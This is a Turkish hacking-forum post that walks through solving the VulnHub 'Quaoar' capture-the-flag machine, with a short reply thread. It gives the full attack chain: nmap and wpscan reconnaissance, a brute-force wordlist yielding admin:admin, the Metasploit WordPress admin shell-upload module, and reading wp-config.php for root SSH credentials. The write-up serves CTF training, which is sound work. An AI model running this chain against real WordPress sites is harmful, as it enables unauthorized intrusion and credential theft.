Quaoar :Açıklı Makine Çözümü /-The Hacker

'Creative

Kıdemli Üye
16 Mar 2017
3,246
92
IT23OH.png


Merhaba Arkadaşlar Bu Konuda "Quaoar VM" Açıklı Makinesinin Nasıl Çözüldüğünü Anlatıcam. Ctf Alanında İlerlemek İstiyor İseniz Yada Daha Yeni Başladıysanız Bu Konu Tam Sizler İçin Çünkü Makine Açıklamasında Bile ;


Lh4csw.png

Yazmakta Ki Bencede Öyle Bu Konunun Açılma Sebebi Temel Olarak Forumdaki Yeni Başlamış Hevesli Kitleye Hitap Etmek. CTF Hakkında Daha Detaylı Bilgiye Şu Rehber Konudan Ulaşabilirsiniz.

Kod:
[URL="https://www.turkhackteam.org/capture-flag/1807884-mutlaka-okuyun-capture-flag-bolum-rehberi.html"]https://www.turkhackteam.org/capture-flag/1807884-mutlaka-okuyun-capture-flag-bolum-rehberi.html[/URL]

Bölümü Güncel Olarak Takip Ederek Kendinizi Geliştirebilirsiniz. Konuya Geçelim.

APM7O5.png


Kod:
[URL="https://www.vulnhub.com/entry/hackfest2016-quaoar,180/"]https://www.vulnhub.com/entry/hackfest2016-quaoar,180/[/URL]
Kod:
[COLOR="Red"][SIZE="3"][FONT="Comic Sans MS"][B]Hedef ;  Bu makinede 3 tane bayrak vardır 1. Bir kabuk alın 2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var (Gugıl İle Çevirdim Çeviri Ne Kadar Doğru Bilemem.)
[/B][/FONT][/SIZE][/COLOR]


Şimdi İse Çözüme Geçelim.


vZtRii.png

İlk Olarak Hedef Makinemizim İp Adresini Bulmak İçin "netdiscover" Aracını Çalıştıralım.


MToSSG.png


Hedef İp Adresini Öğrendiğimize Göre Nmap Taraması Yaparak Açık Portları Görelim.


Kod:
nmap -A -T4 192.168.1.13

aER6JR.png


Nmap Tarama Sonuçlarını İncelediyseniz Eğer Dikkatinizi Benim Gibi Robots.txt Dosyası Çekmiştir. İncelemek Üzere Curl Aracını Çalıştırıyorum.


Kod:
curl 192.168.1.13/robots.txt

0Dac0b.png


Beni "/wordpress" Uzantısına Yönlendiriyor Girdiğimde İse Hiçbirşey Bulamadım Buda Beni Otomatik Olarak "/wordpress/wp-login.php" Yönlendirdi .

EvUPEq.png

Login Ekranında Pek Fazla Birşey Yapamayacağım İçin "wpscan" Aracını Kullanarak Sistemdeki Açıkları ve Username'leri Bulacağız.
Kullanacağım Komut ;


Kod:
wpscan --url http://192.168.1.13/wordpress/ --enumerate u

z492B9.png

Sonuç Olarak Bana 2 Tane Username Verdi Bende Bunları Burpsuite Üzerindne Kaba Kuvvet Saldırısında Kullanıcam.
(Burpsuite İşin Tamamen Can Sıkıntısından Kullanıldı Ki Diğer Kolay Yollarlada Şifreyi Bulabilirsiniz. Misal Hydra İlede Deneyebilirsiniz. )


ROBYqo.png


kU6OrW.png

Kullandığım Wordlist İse ;
Username
Kod:
admin
wpuser
Password

Kod:
password
administrator
admin
wpuser
wordpress
wpadministrator

0LgQFs.png


ppqJiM.png

Bu Şekilde de Sitenin Admin Giriş Bilgilerini Kaba Kuvvet Saldırısı İle Bulduk.


Kod:
admin:admin

(Anlatım Zaten Forumda Olduğu İçin Yeniden Yazma Gereği Duymadım Şu Konuda Bulabilirsiniz;https://www.turkhackteam.org/siber-guvenlik/1739993-istediginiz-sitede-brute-force-saldirisi-burp-suite-ile-ram_hacker.html )

ebo0oB.png

Şimdi İse İlk Görevi Yapalım O Zaman. "1. Bir kabuk alın" Sisteme Shell Upload Edicez Kullanıcağımız Modül

Kod:
use exploit/unix/webapp/wp_admin_shell_upload

Gerekli Bilgileri Girelim.


Kod:
set PASSWORD admin
 set USERNAME admin
set RHOST 192.168.1.13
set TARGETURI /wordpress/
run

2fYFF4.png


Meterpreter Shell'imizi Aldığımızı Göre Diğer Görevler Yani "2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var "
Bundan Sonra İse pwd ile hangi dizinde olduğumuzu öğrenip Bayrağımızı arıyoruz.


eaqkL3.png


İlk Bayrağımızı Yakalamış Olduk. Kodlar;

Kod:
cd /home
cd wpadmin
ls
cat flag.txt

Sıra İkinci Bayrakta Bunun İçinde Artık /home Dizininden Çıkmak Gerekli


Kod:
cd /

Komutu ile çıkıp "ls" Komutu İle Bulunduğumuz Dizini Listeliyoruz. Dizinlerde Gezerken Yapılandırma Dosyasını Gördüm Ve Düşündüğüm Gibi;

Kod:
cd /var
ls
cd www
ls
cd wordpress
ls
cat wp-config.php

Ve Ssh Bağlantı Bilgilerimizide Almış Olduk.

JwVlnI.png



Kod:
root
rootpassword!

Bağlantıyı Kurup .

WT3ipG.png

Bayrağımızı Yakalayalım.
Tek Girmeniz Gereken Kod'lar


Kod:
ls 
more flag.txt
Ve 2.ci Bayrağımızıda Bulduk.


XMzKHw.png


Konu Buraya Kadardı Ayrıca Bendende Buraya Kadardı 20 Saat Civarı Uyumuyordum Uykuyu Hakettiğimi Düşünüyorum Size İyi Okumalar Banada İyi Uykular :))
 
Son düzenleme:

Daedalus

Üye
11 Tem 2015
216
0
Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?
 

'Creative

Kıdemli Üye
16 Mar 2017
3,246
92
Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?

Elbette https://www.vulnhub.com/ Sitesinden Kendi Bilginizi Test Amaçlı ve Kendinizi Geliştirmek İçin Diğer Makinelere Ulaşabilirsiniz. Rehber Konuyuda Okuyarak Zafiyetli Makineler Hakkında Diğer Bilgilere Ve Paylaşılan Platformlara Bakabilirsin.
https://www.turkhackteam.org/capture-flag/1807884-mutlaka-okuyun-capture-flag-bolum-rehberi.html
İkinci Soru İçinde https://www.turkhackteam.org/capture-flag/ Bölümünü Güncel Olarak Takip Ederseniz Zaten Bu Gibi Konuların Geldiğini Ve Geleceğinide Görürsünüz
.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.